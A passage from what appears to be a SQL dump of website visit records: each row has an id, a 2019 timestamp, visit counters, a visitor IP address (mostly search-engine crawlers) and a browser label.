9.198.27','other'),(439197,1564653684,1,1,0,0,'66.249.66.222','chrome'),(439198,1564654051,2,2,0,0,'157.55.39.104','other'),(439199,1564654251,2,2,0,0,'66.249.66.218','chrome'),(439200,1564654710,1,1,0,0,'109.74.154.72','chrome'),(439201,1564654966,1,1,0,0,'5.45.207.79','other'),(439202,1564655694,1,1,0,0,'66.249.66.218','chrome'),(439203,1564655979,1,1,0,0,'207.46.13.59','other'),(439204,1564656568,1,1,0,0,'5.45.207.79','other'),(439205,1564656591,1,1,0,0,'66.249.66.132','chrome'),(439206,1564656780,1,1,0,0,'157.55.39.104','other'),(439207,1564656789,2,2,0,0,'66.249.66.218','chrome'),(439208,1564657474,2,2,0,0,'66.249.66.220','chrome'),(439209,1564657836,2,2,0,0,'66.249.66.218','chrome'),(439210,1564657879,1,1,0,0,'141.8.188.11','other'),(439211,1564658070,1,1,0,0,'40.77.167.189','other'),(439212,1564658411,1,1,0,0,'66.249.66.128','chrome'),(439213,1564658579,1,1,0,0,'207.46.13.59','other'),(439214,1564658801,1,1,0,0,'193.194.124.166','chrome'),(439215,1564659874,1,1,0,0,'5.45.207.19','other'),(439216,1564659996,1,1,0,0,'91.196.178.72','chrome'),(439217,1564660009,3,3,0,0,'66.249.66.222','chrome'),(439218,1564660219,1,1,0,0,'66.249.66.218','chrome'),(439219,1564660293,1,1,0,0,'180.76.15.144','other'),(439220,1564660749,1,1,0,0,'207.46.13.141','other'),(439221,1564661035,1,1,0,0,'91.196.178.77','firefox'),(439222,1564661314,2,2,0,0,'66.249.66.220','chrome'),(439223,1564661349,2,2,0,0,'66.249.66.222','chrome'),(439224,1564661602,1,1,0,0,'8.29.198.27','other'),(439225,1564661799,1,1,0,0,'91.196.178.72','chrome'),(439226,1564662183,1,1,0,0,'40.77.167.189','other'),(439227,1564662438,1,1,0,0,'176.36.21.189','chrome'),(439228,1564662565,1,1,0,0,'207.46.13.141','other'),(439229,1564663231,2,2,0,0,'66.249.66.220','chrome'),(439230,1564663321,2,1,1,0,'66.249.66.128',''),(439231,1564663464,1,1,0,0,'66.249.66.218','chrome'),(439232,1564663465,1,1,0,0,'91.196.178.77','firefox'),(439233,1564664036,1,1,0,0,'8.29.198.27','other'),(439234,1564664299,1,1,0,0,'91.196.178.175','chrome'),(439235,1564664670,1,1,0,0,'66.249.66.220','chrome'),(439236,1564664738,1,1,0,0,'91.196.177.46','chrome'),(439237,1564664966,1,1,0,0,'66.249.66.222','chrome'),(439238,1564665009,1,1,0,0,'66.249.66.218','chrome'),(439239,1564665543,1,1,0,0,'91.196.178.72','chrome'),(439240,1564665590,1,1,0,0,'66.249.66.132','chrome'),(439241,1564666464,1,1,0,0,'207.46.13.59','other'),(439242,1564666748,1,1,0,0,'66.249.66.218','chrome'),(439243,1564666785,2,2,0,0,'66.249.66.220','chrome'),(439244,1564667503,1,1,0,0,'207.46.13.59','other'),(439245,1564667875,3,3,0,0,'66.249.66.222','chrome'),(439246,1564667931,1,1,0,0,'91.196.178.131','firefox'),(439247,1564668183,1,1,0,0,'176.104.4.17','chrome'),(439248,1564668280,1,1,0,0,'40.77.167.189','other'),(439249,1564668396,1,1,0,0,'157.55.39.104','other'),(439250,1564668450,2,2,0,0,'66.249.66.218','chrome'),(439251,1564668783,1,1,0,0,'87.250.224.65','other'),(439252,1564669318,1,1,0,0,'157.55.39.104','other'),(439253,1564669326,1,1,0,0,'66.249.66.220','chrome'),(439254,1564670592,1,1,0,0,'66.249.66.218','chrome'),(439255,1564671014,1,1,0,0,'66.249.66.220','chrome'),(439256,1564672446,1,1,0,0,'8.29.198.26','other'),(439257,1564672675,1,1,0,0,'141.8.188.11','other'),(439258,1564673278,1,1,0,0,'157.55.39.104','other'),(439259,1564674893,1,1,0,0,'8.29.198.27','other'),(439260,1564675775,1,1,0,0,'40.77.167.155','other'),(439261,1564675988,1,1,0,0,'66.249.66.218','chrome'),(439262,1564676012,1,1,0,0,'91.209.11.236','other'),(439263,1564677659,1,1,0,0,'66.249.66.218','chrome'),(439264,1564678252,2,2,0,0,'207.46.13.141','other'),(439265,1564679306,1,1,0,0,'66.249.66.220','chrome'),(439266,1564679552,1,1,0,0,'40.77.167.159','other'),(439267,1564680421,1,1,0,0,'66.249.66.132','chrome'),(439268,1564680540,1,1,0,0,'40.77.167.155','other'),(439269,1564681121,1,1,0,0,'40.77.167.159','other'),(439270,1564681204,1,1,0,0,'66.249.66.222','chrome'),(439271,1564681879,1,1,0,0,'40.77.167.155','other'),(439272,1564683054,2,2,0,0,'40.77.167.29','other'),(439273,1564683290,1,1,0,0,'8.29.198.27','other'),(439274,1564683849,1,1,0,0,'66.249.66.218','chrome'),(439275,1564684395,1,1,0,0,'66.249.66.222','chrome'),(439276,1564684418,1,1,0,0,'5.45.207.19','other'),(439277,1564684428,1,1,0,0,'40.77.167.29','other'),(439278,1564684901,1,1,0,0,'66.249.66.130','chrome'),(439279,1564685024,1,1,0,0,'66.249.66.220','chrome'),(439280,1564685174,3,3,0,0,'40.77.167.159','other'),(439281,1564685682,1,1,0,0,'66.249.66.218','chrome'),(439282,1564685741,1,1,0,0,'8.29.198.27','other'),(439283,1564686004,1,1,0,0,'178.133.221.160','chrome'),(439284,1564686739,1,1,0,0,'40.77.167.159','other'),(439285,1564687045,1,1,0,0,'40.77.167.155','other'),(439286,1564687122,1,1,0,0,'66.249.66.220','chrome'),(439287,1564688454,1,1,0,0,'141.8.188.11','other'),(439288,1564688784,1,1,0,0,'207.46.13.21','other'),(439289,1564689522,1,1,0,0,'66.249.66.222','chrome'),(439290,1564689581,2,2,0,0,'66.249.66.218','chrome'),(439291,1564691327,2,2,0,0,'141.8.188.29','other'),(439292,1564691433,2,2,0,0,'66.249.66.218','chrome'),(439293,1564691484,1,1,0,0,'66.249.66.128','chrome'),(439294,1564691844,1,1,0,0,'66.249.66.132','chrome'),(439295,1564691940,1,1,0,0,'40.77.167.159','other'),(439296,1564692603,1,1,0,0,'141.8.188.29','other'),(439297,1564692830,1,1,0,0,'66.249.66.218','chrome'),(439298,1564693223,1,1,0,0,'66.249.66.220','chrome'),(439299,1564693889,1,1,0,0,'5.45.207.79','other'),(439300,1564693952,1,1,0,0,'141.8.188.11','other'),(439301,1564694157,1,1,0,0,'8.29.198.26','other'),(439302,1564694282,1,1,0,0,'141.8.188.29','other'),(439303,1564694405,2,2,0,0,'40.77.167.29','other'),(439304,1564694579,1,1,0,0,'176.110.134.2','chrome'),(439305,1564695015,1,1,0,0,'40.77.167.159','other'),(439306,1564695328,1,1,0,0,'66.249.66.222','chrome'),(439307,1564696390,2,2,0,0,'40.77.167.155','other'),(439308,1564696483,1,1,0,0,'66.249.66.222','chrome'),(439309,1564696518,2,2,0,0,'141.8.188.29','other'),(439310,1564696592,1,1,0,0,'8.29.198.25','other'),(439311,1564696792,1,1,0,0,'40.77.167.29','other'),(439312,1564698181,1,1,0,0,'66.249.66.220','chrome'),(439313,1564698215,1,1,0,0,'141.8.188.11','other'),(439314,1564698528,1,1,0,0,'207.46.13.47','other'),(439315,1564698744,1,1,0,0,'66.249.66.132','chrome'),(439316,1564699600,1,1,0,0,'66.249.66.220','chrome'),(439317,1564699641,1,1,0,0,'87.250.224.65','other'),(439318,1564699645,1,1,0,0,'141.8.188.49','other'),(439319,1564700118,1,1,0,0,'66.249.66.218','chrome'),(439320,1564700288,1,1,0,0,'87.250.224.47','other'),(439321,1564700785,1,1,0,0,'66.249.66.132','chrome'),(439322,1564700818,1,1,0,0,'66.249.66.128','chrome'),(439323,1564700939,2,2,0,0,'141.8.188.29','other'),(439324,1564700942,1,1,0,0,'66.249.66.130','chrome'),(439325,1564701771,1,1,0,0,'5.45.207.79','other'),(439326,1564701976,1,1,0,0,'66.249.66.220','chrome'),(439327,1564702690,1,1,0,0,'5.45.207.19','other'),(439328,1564703575,2,2,0,0,'66.249.66.218','chrome'),(439329,1564705002,1,1,0,0,'8.29.198.27','other'),(439330,1564706391,2,2,0,0,'66.249.66.222','chrome'),(439331,1564706841,1,1,0,0,'66.249.66.218','chrome'),(439332,1564707447,1,1,0,0,'8.29.198.26','other'),(439333,1564707630,1,1,0,0,'141.8.188.29','other'),(439334,1564707715,2,2,0,0,'66.249.66.220','chrome'),(439335,1564708062,1,1,0,0,'181.215.222.126','other'),(439336,1564708977,1,1,0,0,'66.249.66.132','chrome'),(439337,1564709084,1,1,0,0,'5.45.207.19','other'),(439338,1564709094,1,1,0,0,'141.8.188.11','other'),(439339,1564709257,1,1,0,0,'66.249.66.220','chrome'),(439340,1564709759,2,2,0,0,'40.77.167.44','other'),(439341,1564709764,2,2,0,0,'40.77.167.94','other'),(439342,1564709784,1,1,0,0,'60.169.77.98','chrome'),(439343,1564710894,2,2,0,0,'66.249.66.218','chrome'),(439344,1564711246,1,1,0,0,'66.249.66.222','chrome'),(439345,1564711512,2,2,0,0,'40.77.167.129','other'),(439346,1564712443,3,3,0,0,'40.77.167.129','other'),(439347,1564712982,1,1,0,0,'66.249.66.218','chrome'),(439348,1564713191,1,1,0,0,'5.45.207.79','other'),(439349,1564714596,1,1,0,0,'66.249.66.132','chrome'),(439350,1564714902,1,1,0,0,'193.106.30.99','chrome'),(439351,1564715575,1,1,0,0,'5.45.207.79','other'),(439352,1564715840,1,1,0,0,'8.29.198.27','other'),(439353,1564715959,1,1,0,0,'40.77.167.103','other'),(439354,1564715980,1,1,0,0,'66.249.66.222','chrome'),(439355,1564716895,1,1,0,0,'207.46.13.154','other'),(439356,1564717312,1,1,0,0,'141.8.188.29','other'),(439357,1564717428,1,1,0,0,'40.77.167.103','other'),(439358,1564718215,1,1,0,0,'66.249.66.130','chrome'),(439359,1564718286,1,1,0,0,'8.29.198.27','other'),(439360,1564718554,1,1,0,0,'207.46.13.154','other'),(439361,1564718731,1,1,0,0,'207.46.13.157','other'),(439362,1564718752,1,1,0,0,'91.209.11.236','other'),(439363,1564718753,1,1,0,0,'188.32.254.169','msie'),(439364,1564720503,1,1,0,0,'40.77.167.50','other'),(439365,1564721089,1,1,0,0,'13.66.139.0','other'),(439366,1564721837,1,1,0,0,'5.45.207.19','other'),(439367,1564721951,2,2,0,0,'40.77.167.58','other'),(439368,1564721955,1,1,0,0,'40.77.167.111','other'),(439369,1564722500,1,1,0,0,'91.209.11.236','other'),(439370,1564722557,1,1,0,0,'5.45.207.79','other'),(439371,1564723479,1,1,0,0,'40.77.167.111','other'),(439372,1564723567,2,2,0,0,'141.8.188.11','other'),(439373,1564723579,1,1,0,0,'207.46.13.44','other'),(439374,1564724241,1,1,0,0,'5.45.207.19','other'),(439375,1564725007,1,1,0,0,'207.46.13.44','other'),(439376,1564725630,1,1,0,0,'40.77.167.111','other'),(439377,1564726679,1,1,0,0,'8.29.198.25','other'),(439378,1564727010,1,1,0,0,'141.8.188.29','other'),(439379,1564727127,1,1,0,0,'93.171.245.19','chrome'),(439380,1564727303,1,1,0,0,'130.180.217.4','chrome'),(439381,1564727345,1,1,0,0,'176.36.21.189','chrome'),(439382,1564727505,1,1,0,0,'66.249.66.222','chrome'),(439383,1564728443,1,1,0,0,'46.201.224.81','chrome'),(439384,1564728687,1,1,0,0,'66.249.66.222','chrome'),(439385,1564729121,1,1,0,0,'8.29.198.25','other'),(439386,1564729925,1,1,0,0,'66.249.66.220','chrome'),(439387,1564730518,1,1,0,0,'66.249.66.222','chrome'),(439388,1564730942,1,1,0,0,'46.201.54.225','firefox'),(439389,1564731093,1,1,0,0,'66.249.66.218','chrome'),(439390,1564731495,1,1,0,0,'66.249.66.130','chrome'),(439391,1564731884,2,2,0,0,'66.249.66.222','chrome'),(439392,1564732790,1,1,0,0,'13.66.139.0','other'),(439393,1564732820,2,2,0,0,'141.8.188.11','other'),(439394,1564733098,1,1,0,0,'66.249.66.218','chrome'),(439395,1564733300,1,1,0,0,'5.45.207.79','other'),(439396,1564733316,1,1,0,0,'141.8.188.29','other'),(439397,1564733763,2,2,0,0,'66.249.66.132','chrome'),(439398,1564733766,1,1,0,0,'66.249.66.222','chrome'),(439399,1564734635,1,1,0,0,'66.249.66.130','chrome'),(439400,1564734922,2,2,0,0,'141.8.188.29','other'),(439401,1564734989,1,1,0,0,'157.55.39.245','other'),(439402,1564735416,2,2,0,0,'91.209.11.236','other'),(439403,1564736494,1,1,0,0,'180.76.15.23','other'),(439404,1564737050,1,1,0,0,'66.249.66.130','chrome'),(439405,1564737069,1,1,0,0,'66.249.66.218','chrome'),(439406,1564737128,1,1,0,0,'91.196.178.93','firefox'),(439407,1564737488,1,1,0,0,'207.46.13.34','other'),(439408,1564737543,1,1,0,0,'8.29.198.26','other'),(439409,1564738261,2,2,0,0,'66.249.66.222','chrome'),(439410,1564738495,1,1,0,0,'180.76.15.139','other'),(439411,1564739889,1,1,0,0,'141.8.188.29','other'),(439412,1564739960,1,1,0,0,'8.29.198.27','other'),(439413,1564740553,2,2,0,0,'66.249.66.218','chrome'),(439414,1564740621,2,2,0,0,'66.249.66.220','chrome'),(439415,1564740641,1,1,0,0,'109.74.154.72','chrome'),(439416,1564741239,1,1,0,0,'95.108.213.4','other'),(439417,1564741266,1,1,0,0,'193.106.30.99','chrome'),(439418,1564742019,1,1,0,0,'207.46.13.27','other'),(439419,1564742026,1,1,0,0,'66.249.66.130','chrome'),(439420,1564742583,1,1,0,0,'157.55.39.245','other'),(439421,1564742920,3,3,0,0,'66.249.66.220','chrome'),(439422,1564743117,3,3,0,0,'207.46.13.158','other'),(439423,1564743703,1,1,0,0,'40.77.167.81','other'),(439424,1564744268,1,1,0,0,'66.249.66.222','chrome'),(439425,1564744455,1,1,0,0,'157.55.39.245','other'),(439426,1564745820,2,2,0,0,'207.46.13.39','other'),(439427,1564745959,1,1,0,0,'157.55.39.245','other'),(439428,1564746140,1,1,0,0,'40.77.167.81','other'),(439429,1564746145,1,1,0,0,'207.46.13.209','other'),(439430,1564746716,3,3,0,0,'66.249.66.218','chrome'),(439431,1564746853,1,1,0,0,'66.249.66.220','chrome'),(439432,1564746945,1,1,0,0,'66.249.66.132','chrome'),(439433,1564747192,1,1,0,0,'157.55.39.111','other'),(439434,1564747197,2,2,0,0,'207.46.13.211','other'),(439435,1564747201,1,1,0,0,'40.77.167.12','other'),(439436,1564747490,1,1,0,0,'91.196.178.72','chrome'),(439437,1564748384,1,1,0,0,'8.29.198.26','other'),(439438,1564748503,1,1,0,0,'66.249.66.222','chrome'),(439439,1564749248,1,1,0,0,'66.249.66.218','chrome'),(439440,1564749695,2,2,0,0,'66.249.66.220','chrome'),(439441,1564749858,1,1,0,0,'40.77.167.12','other'),(439442,1564750473,1,1,0,0,'66.249.66.218','chrome'),(439443,1564750704,1,1,0,0,'91.209.11.236','other'),(439444,1564750803,1,1,0,0,'8.29.198.27','other'),(439445,1564750811,1,1,0,0,'40.77.167.139','other'),(439446,1564753145,1,1,0,0,'207.46.13.101','other'),(439447,1564753664,1,1,0,0,'66.249.66.218','chrome'),(439448,1564753771,2,2,0,0,'66.249.66.222','chrome'),(439449,1564754031,1,1,0,0,'66.249.66.220','chrome'),(439450,1564754160,1,1,0,0,'66.249.66.130','chrome'),(439451,1564755934,2,2,0,0,'66.249.66.222','chrome'),(439452,1564755999,2,2,0,0,'66.249.66.220','chrome'),(439453,1564756408,1,1,0,0,'157.55.39.173','other'),(439454,1564757189,2,2,0,0,'141.8.188.29','other'),(439455,1564757688,2,2,0,0,'66.249.66.218','chrome'),(439456,1564758345,2,2,0,0,'66.249.66.220','chrome'),(439457,1564758428,1,1,0,0,'213.180.203.48','other'),(439458,1564758455,2,2,0,0,'141.8.142.144','other'),(439459,1564758491,1,1,0,0,'178.154.171.24','other'),(439460,1564759202,1,1,0,0,'5.255.253.25','other'),(439461,1564759234,1,1,0,0,'8.29.198.26','other'),(439462,1564759644,1,1,0,0,'213.180.203.48','other'),(439463,1564759994,2,2,0,0,'40.77.167.40','other'),(439464,1564760006,1,1,0,0,'66.249.66.218','chrome'),(439465,1564760318,1,1,0,0,'157.55.39.173','other'),(439466,1564760810,1,1,0,0,'66.249.66.220','chrome'),(439467,1564760918,1,1,0,0,'141.8.188.29','other'),(439468,1564760931,4,3,1,0,'66.249.66.218',''),(439469,1564760966,1,1,0,0,'141.8.188.11','other'),(439470,1564761057,1,1,0,0,'40.77.167.114','other'),(439471,1564761655,1,1,0,0,'8.29.198.26','other'),(439472,1564761902,1,1,0,0,'40.77.167.40','other'),(439473,1564762186,2,2,0,0,'40.77.167.114','other'),(439474,1564762458,2,2,0,0,'66.249.66.222','chrome'),(439475,1564762883,1,1,0,0,'40.77.167.40','other'),(439476,1564762960,1,1,0,0,'66.249.66.220','chrome'),(439477,1564763297,2,2,0,0,'141.8.188.29','other'),(439478,1564763326,2,2,0,0,'5.45.207.19','other'),(439479,1564763638,1,1,0,0,'66.249.66.222','chrome'),(439480,1564764369,3,3,0,0,'66.249.66.218','chrome'),(439481,1564764494,3,3,0,0,'141.8.188.29','other'),(439482,1564764549,2,2,0,0,'141.8.188.11','other'),(439483,1564764868,1,1,0,0,'66.249.66.222','chrome'),(439484,1564764898,1,1,0,0,'66.249.66.130','chrome'),(439485,1564765208,1,1,0,0,'40.77.167.114','other'),(439486,1564765327,2,2,0,0,'66.249.66.220','chrome'),(439487,1564765426,1,1,0,0,'207.46.13.12','other'),(439488,1564765760,1,1,0,0,'141.8.188.29','other'),(439489,1564765983,1,1,0,0,'66.249.66.222','chrome'),(439490,1564766395,1,1,0,0,'66.249.66.218','chrome'),(439491,1564766779,1,1,0,0,'66.249.66.130','chrome'),(439492,1564766826,1,1,0,0,'40.77.167.114','other'),(439493,1564767086,1,1,0,0,'141.8.188.29','other'),(439494,1564767803,1,1,0,0,'193.106.30.99','chrome'),(439495,1564768361,1,1,0,0,'207.46.13.180','other'),(439496,1564769561,2,2,0,0,'141.8.188.29','other'),(439497,1564769601,1,1,0,0,'141.8.188.65','other'),(439498,1564769700,1,1,0,0,'66.249.66.130','chrome'),(439499,1564770028,4,4,0,0,'66.249.66.218','chrome'),(439500,1564770076,1,1,0,0,'8.29.198.27','other'),(439501,1564770316,1,1,0,0,'66.249.66.132','chrome'),(439502,1564771266,1,1,0,0,'66.249.66.132','chrome'),(439503,1564771711,1,1,0,0,'141.8.188.11','other'),(439504,1564771924,1,1,0,0,'66.249.66.220','chrome'),(439505,1564772020,2,2,0,0,'66.249.66.222','chrome'),(439506,1564772066,1,1,0,0,'66.249.66.128','chrome'),(439507,1564772499,1,1,0,0,'8.29.198.25','other'),(439508,1564772908,2,2,0,0,'141.8.188.29','other'),(439509,1564773234,1,1,0,0,'40.77.167.88','other'),(439510,1564773663,1,1,0,0,'66.249.66.218','chrome'),(439511,1564774348,2,2,0,0,'157.55.39.131','other'),(439512,1564775520,1,1,0,0,'40.77.167.148','other'),(439513,1564775576,1,1,0,0,'66.249.66.222','chrome'),(439514,1564775903,1,1,0,0,'141.8.188.29','other'),(439515,1564776147,1,1,0,0,'191.96.46.15','other'),(439516,1564777383,1,1,0,0,'157.55.39.59','other'),(439517,1564778675,1,1,0,0,'193.106.30.99','chrome'),(439518,1564778876,1,1,0,0,'157.55.39.240','other'),(439519,1564778989,2,2,0,0,'66.249.66.222','chrome'),(439520,1564779295,1,1,0,0,'141.8.142.81','other'),(439521,1564780276,1,1,0,0,'141.8.188.29','other'),(439522,1564780541,1,1,0,0,'213.180.203.9','other'),(439523,1564780911,1,1,0,0,'8.29.198.27','other'),(439524,1564781012,1,1,0,0,'66.249.66.132','chrome'),(439525,1564782091,1,1,0,0,'157.55.39.211','other'),(439526,1564782584,1,1,0,0,'66.249.66.218','chrome'),(439527,1564782760,1,1,0,0,'157.55.39.240','other'),(439528,1564782763,1,1,0,0,'141.8.188.29','other'),(439529,1564782767,1,1,0,0,'66.249.66.132','chrome'),(439530,1564783352,1,1,0,0,'8.29.198.27','other'),(439531,1564783865,1,1,0,0,'5.45.207.79','other'),(439532,1564784622,1,1,0,0,'141.8.188.29','other'),(439533,1564784725,1,1,0,0,'66.249.66.218','chrome'),(439534,1564785107,1,1,0,0,'141.8.188.11','other'),(439535,1564785663,1,1,0,0,'157.55.39.211','other'),(439536,1564786274,2,2,0,0,'141.8.188.11','other'),(439537,1564787106,1,1,0,0,'66.249.66.222','chrome'),(439538,1564787907,1,1,0,0,'207.46.13.78','other'),(439539,1564788500,2,2,0,0,'66.249.66.220','chrome'),(439540,1564788600,1,1,0,0,'40.77.167.154','other'),(439541,1564789015,1,1,0,0,'91.196.178.168','chrome'),(439542,1564789028,2,2,0,0,'66.249.66.128','chrome'),(439543,1564789147,1,1,0,0,'66.249.66.222','chrome'),(439544,1564789156,1,1,0,0,'141.8.188.11','other'),(439545,1564789319,1,1,0,0,'66.249.66.218','chrome'),(439546,1564789405,2,2,0,0,'66.249.66.132','chrome'),(439547,1564790304,1,1,0,0,'141.8.188.11','other'),(439548,1564790308,1,1,0,0,'66.249.66.218','chrome'),(439549,1564790316,2,2,0,0,'66.249.66.220','chrome'),(439550,1564790428,1,1,0,0,'95.108.213.4','other'),(439551,1564790479,1,1,0,0,'66.249.66.222','chrome'),(439552,1564790795,1,1,0,0,'66.249.66.130','chrome'),(439553,1564791270,1,1,0,0,'157.55.39.131','other'),(439554,1564791518,1,1,0,0,'141.8.188.11','other'),(439555,1564791561,1,1,0,0,'141.8.188.29','other'),(439556,1564791589,1,1,0,0,'157.55.39.253','other'),(439557,1564791761,1,1,0,0,'8.29.198.27','other'),(439558,1564792304,1,1,0,0,'209.17.97.82','other'),(439559,1564792532,1,1,0,0,'66.249.66.220','chrome'),(439560,1564792807,1,1,0,0,'37.9.113.103','other'),(439561,1564793504,1,1,0,0,'37.54.16.14','chrome'),(439562,1564793871,1,1,0,0,'66.249.66.220','chrome'),(439563,1564794223,1,1,0,0,'8.29.198.25','other'),(439564,1564794320,1,1,0,0,'66.249.66.222','chrome'),(439565,1564794431,1,1,0,0,'141.8.188.11','other'),(439566,1564794446,3,3,0,0,'141.8.188.29','other'),(439567,1564795441,2,2,0,0,'66.249.66.222','chrome'),(439568,1564795531,1,1,0,0,'66.249.66.132','chrome'),(439569,1564795985,1,1,0,0,'193.106.30.99','chrome'),(439570,1564796008,1,1,0,0,'5.45.207.79','other'),(439571,1564796200,1,1,0,0,'66.249.66.220','chrome'),(439572,1564796896,1,1,0,0,'157.55.39.253','other'),(439573,1564797217,1,1,0,0,'91.209.11.236','other'),(439574,1564797228,1,1,0,0,'60.191.38.77','firefox'),(439575,1564797444,5,5,0,0,'66.249.66.218','chrome'),(439576,1564797709,1,1,0,0,'180.76.15.134','other'),(439577,1564797729,3,3,0,0,'66.249.66.220','chrome'),(439578,1564797821,1,1,0,0,'66.249.66.222','chrome'),(439579,1564797856,1,1,0,0,'157.55.39.131','other'),(439580,1564797865,1,1,0,0,'66.249.66.128','chrome'),(439581,1564798285,1,1,0,0,'157.55.39.253','other'),(439582,1564798416,1,1,0,0,'141.8.188.11','other'),(439583,1564798728,4,4,0,0,'66.249.66.220','chrome'),(439584,1564798956,1,1,0,0,'66.249.66.222','chrome'),(439585,1564799518,1,1,0,0,'37.9.113.20','other'),(439586,1564799689,1,1,0,0,'141.8.188.29','other'),(439587,1564799776,1,1,0,0,'157.55.39.253','other'),(439588,1564799931,1,1,0,0,'40.77.167.18','other'),(439589,1564800594,1,1,0,0,'66.249.66.218','chrome'),(439590,1564800767,3,3,0,0,'66.249.66.220','chrome'),(439591,1564801635,1,1,0,0,'141.8.188.11','other'),(439592,1564801721,2,2,0,0,'66.249.66.218','chrome'),(439593,1564802306,2,2,0,0,'40.77.167.160','other'),(439594,1564802601,1,1,0,0,'8.29.198.26','other'),(439595,1564802649,1,1,0,0,'66.249.66.222','chrome'),(439596,1564802701,1,1,0,0,'5.45.207.79','other'),(439597,1564802726,1,1,0,0,'141.8.188.11','other'),(439598,1564803199,1,1,0,0,'207.46.13.141','other'),(439599,1564804098,1,1,0,0,'176.36.21.189','chrome'),(439600,1564805060,1,1,0,0,'8.29.198.27','other'),(439601,1564805073,1,1,0,0,'157.55.39.174','other'),(439602,1564805113,1,1,0,0,'40.77.167.18','other'),(439603,1564805847,1,1,0,0,'66.249.66.218','chrome'),(439604,1564805934,1,1,0,0,'66.249.66.222','chrome'),(439605,1564806422,3,3,0,0,'157.55.39.174','other'),(439606,1564807280,1,1,0,0,'66.249.66.222','chrome'),(439607,1564808126,1,1,0,0,'66.249.66.218','chrome'),(439608,1564808725,1,1,0,0,'60.191.38.77','firefox'),(439609,1564809562,1,1,0,0,'40.77.167.18','other'),(439610,1564810649,1,1,0,0,'66.249.66.218','chrome'),(439611,1564810708,1,1,0,0,'66.249.66.220','chrome'),(439612,1564810835,1,1,0,0,'62.210.99.162','other'),(439613,1564812047,1,1,0,0,'5.45.207.19','other'),(439614,1564812178,1,1,0,0,'66.249.66.220','chrome'),(439615,1564813799,1,1,0,0,'141.8.188.29','other'),(439616,1564813886,1,1,0,0,'8.29.198.25','other'),(439617,1564814910,2,2,0,0,'157.55.39.174','other'),(439618,1564815254,2,2,0,0,'66.249.66.130','chrome'),(439619,1564815414,1,1,0,0,'141.8.188.29','other'),(439620,1564815902,1,1,0,0,'8.29.198.26','other'),(439621,1564816025,4,4,0,0,'40.77.167.160','other'),(439622,1564816768,1,1,0,0,'66.249.66.220','chrome'),(439623,1564816858,5,5,0,0,'207.46.13.141','other'),(439624,1564816866,4,4,0,0,'157.55.39.172','other'),(439625,1564816876,4,4,0,0,'157.55.39.174','other'),(439626,1564817336,1,1,0,0,'66.249.66.218','chrome'),(439627,1564820262,1,1,0,0,'91.196.178.187','chrome'),(439628,1564820751,1,1,0,0,'207.46.13.141','other'),(439629,1564821240,1,1,0,0,'66.249.66.132','chrome'),(439630,1564821350,1,1,0,0,'66.249.66.222','chrome'),(439631,1564822866,1,1,0,0,'176.8.245.171','chrome'),(439632,1564823664,1,1,0,0,'66.249.66.218','chrome'),(439633,1564824282,1,1,0,0,'141.8.188.11','other'),(439634,1564825879,1,1,0,0,'207.46.13.163','other'),(439635,1564827078,1,1,0,0,'207.46.13.141','other'),(439636,1564827177,1,1,0,0,'8.29.198.27','other'),(439637,1564827498,1,1,0,0,'109.74.154.72','chrome'),(439638,1564828726,1,1,0,0,'91.209.11.236','other'),(439639,1564829134,1,1,0,0,'207.46.13.171','other'),(439640,1564829351,1,1,0,0,'66.249.66.222','chrome'),(439641,1564831905,1,1,0,0,'66.249.66.220','chrome'),(439642,1564832293,1,1,0,0,'66.249.66.218','chrome'),(439643,1564833196,1,1,0,0,'66.249.66.222','chrome'),(439644,1564833876,1,1,0,0,'207.46.13.171','other'),(439645,1564833880,1,1,0,0,'157.55.39.122','other'),(439646,1564833990,1,1,0,0,'141.8.188.29','other'),(439647,1564834629,1,1,0,0,'66.249.66.220','chrome'),(439648,1564835216,1,1,0,0,'141.8.188.29','other'),(439649,1564836025,1,1,0,0,'8.29.198.26','other'),(439650,1564836114,2,2,0,0,'66.249.66.128','chrome'),(439651,1564836447,6,6,0,0,'66.249.66.218','chrome'),(439652,1564837112,4,4,0,0,'66.249.66.220','chrome'),(439653,1564837257,1,1,0,0,'66.249.66.130','chrome'),(439654,1564837413,1,1,0,0,'5.9.98.178','other'),(439655,1564837414,1,1,0,0,'66.249.66.222','chrome'),(439656,1564838018,1,1,0,0,'8.29.198.26','other'),(439657,1564838131,2,2,0,0,'66.249.66.218','chrome'),(439658,1564838135,2,2,0,0,'66.249.66.220','chrome'),(439659,1564838315,1,1,0,0,'5.9.98.178','other'),(439660,1564838380,2,2,0,0,'66.249.66.222','chrome'),(439661,1564839222,1,1,0,0,'5.9.98.178','other'),(439662,1564840130,2,2,0,0,'40.77.167.43','other'),(439663,1564840137,1,1,0,0,'5.9.98.178','other'),(439664,1564840339,2,2,0,0,'66.249.66.222','chrome'),(439665,1564840532,1,1,0,0,'66.249.66.218','chrome'),(439666,1564840563,1,1,0,0,'66.249.66.128','chrome'),(439667,1564840611,1,1,0,0,'157.55.39.216','other'),(439668,1564840911,2,2,0,0,'66.249.66.220','chrome'),(439669,1564840928,1,1,0,0,'157.55.39.187','other'),(439670,1564840985,1,1,0,0,'13.66.139.0','other'),(439671,1564841038,1,1,0,0,'5.9.98.178','other'),(439672,1564841840,1,1,0,0,'207.46.13.65','other'),(439673,1564841949,1,1,0,0,'5.9.98.178','other'),(439674,1564841970,1,1,0,0,'66.249.66.218','chrome'),(439675,1564842038,1,1,0,0,'157.55.39.216','other'),(439676,1564842113,1,1,0,0,'13.66.139.0','other'),(439677,1564842372,2,2,0,0,'66.249.66.222','chrome'),(439678,1564843064,2,2,0,0,'66.249.66.220','chrome'),(439679,1564843230,1,1,0,0,'66.249.66.218','chrome'),(439680,1564843337,1,1,0,0,'87.250.224.65','other'),(439681,1564843657,1,1,0,0,'194.54.160.89','chrome'),(439682,1564844046,1,1,0,0,'157.55.39.216','other'),(439683,1564844142,2,2,0,0,'66.249.66.220','chrome'),(439684,1564845226,1,1,0,0,'40.77.167.43','other'),(439685,1564845546,1,1,0,0,'141.8.188.29','other'),(439686,1564846189,1,1,0,0,'66.249.66.220','chrome'),(439687,1564846623,1,1,0,0,'66.249.66.218','chrome'),(439688,1564846777,2,2,0,0,'40.77.167.43','other'),(439689,1564846816,2,2,0,0,'157.55.39.216','other'),(439690,1564846878,1,1,0,0,'8.29.198.26','other'),(439691,1564847643,1,1,0,0,'66.249.66.220','chrome'),(439692,1564848240,1,1,0,0,'207.46.13.139','other'),(439693,1564848866,1,1,0,0,'8.29.198.25','other'),(439694,1564849684,2,2,0,0,'157.55.39.199','other'),(439695,1564850046,1,1,0,0,'193.106.30.99','chrome'),(439696,1564850222,1,1,0,0,'40.77.167.43','other'),(439697,1564850450,2,2,0,0,'66.249.66.218','chrome'),(439698,1564850